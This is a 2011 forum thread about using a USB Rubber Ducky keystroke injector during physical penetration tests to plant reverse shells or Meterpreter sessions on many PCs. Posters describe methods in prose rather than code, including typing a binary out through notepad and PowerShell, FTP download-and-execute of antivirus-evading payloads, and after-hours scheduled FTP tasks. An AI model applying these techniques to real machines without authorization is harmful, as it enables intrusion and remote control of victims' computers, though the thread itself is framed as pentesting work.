mackwage Posted October 5, 2011 Posted October 5, 2011 Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once as netcat cannot juggle multiple connections. Was trying to think if during a physical pentest, you could use the ducky on every pc in sight to set a meterpreter session back to your computer so you have a shell on all of them at once. Thoughts? Quote
pyro2927 Posted October 6, 2011 Posted October 6, 2011 Refer to title. With the current reverse shell, there would be no way to handle pwning several boxes at once as netcat cannot juggle multiple connections. Was trying to think if during a physical pentest, you could use the ducky on every pc in sight to set a meterpreter session back to your computer so you have a shell on all of them at once. Thoughts? Interesting you bring that up! I just started working on getting something like that working about 3 hours ago with the help of SET. I'll report back when I make progress. Quote
pyro2927 Posted October 6, 2011 Posted October 6, 2011 Great! Keep me up to date! :) I certainly will! It will actually be similar to his Teensy attack from SET. It'll create an inject.bin file that will type out binary in notepad, use some powershell, and run it. I'm running into a SET issue right now with it being finicky about importing 3rd party modules, but I'll definitely keep this thread posted with info Quote
Netshroud Posted October 6, 2011 Posted October 6, 2011 Why not just run msfpayload, then use the same old tricks to decode and run the executable? Quote
Mr-Protocol Posted October 6, 2011 Posted October 6, 2011 (edited) I am trying to make my teensy just FTP and download then exec a meterpreter payload. Just need to make an "AV" friendly one. Other than that, my code is done. Edited October 6, 2011 by Mr-Protocol Quote
Darren Kitchen Posted October 6, 2011 Posted October 6, 2011 A quick to deploy and effective payload creates a txt file with FTP commands, then schedules an "FTP -S" task to run said commands at a specific time (like after hours when the user is away from their desk) using the AT command. The SET binary - hex converter will work on the Ducky as does IllWill's encode.vbs and decode,vbs http://dabermania.blogspot.com/2011/03/converting-any-file-to-ascii-for.html Quote
pyro2927 Posted October 7, 2011 Posted October 7, 2011 SET payload is almost done. It's all in python, and this will be my 2nd python script ever, so it's taking some time as I learn the syntax and stuff. Whitespace dependent is not something that is easy to work with, but I'm getting used to it. The script actually runs and works, creates an inject.bin, though it's dependent on duckencoder/jpduckencoder to actually create the bin file. I'm hoping to port the conversion code to python and have it all self contained, and clean up the script. If it gets fully done I'll post it this weekend! Quote
nopenopenope Posted October 7, 2011 Posted October 7, 2011 or just use the single netcat and escalate that to a meterpreter session and pivot and then get multiple sessions? but sticking in a duck and pwning is so much faster than pivoting lol. but thats another option, biggest step is getting your foot in the door and move around from there. Quote
pyro2927 Posted October 7, 2011 Posted October 7, 2011 I got some code running on my Ducky, but I'm getting an error when it tries to run the powershell command: http://cl.ly/3p3X0G3a1p1v2p352K3O Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.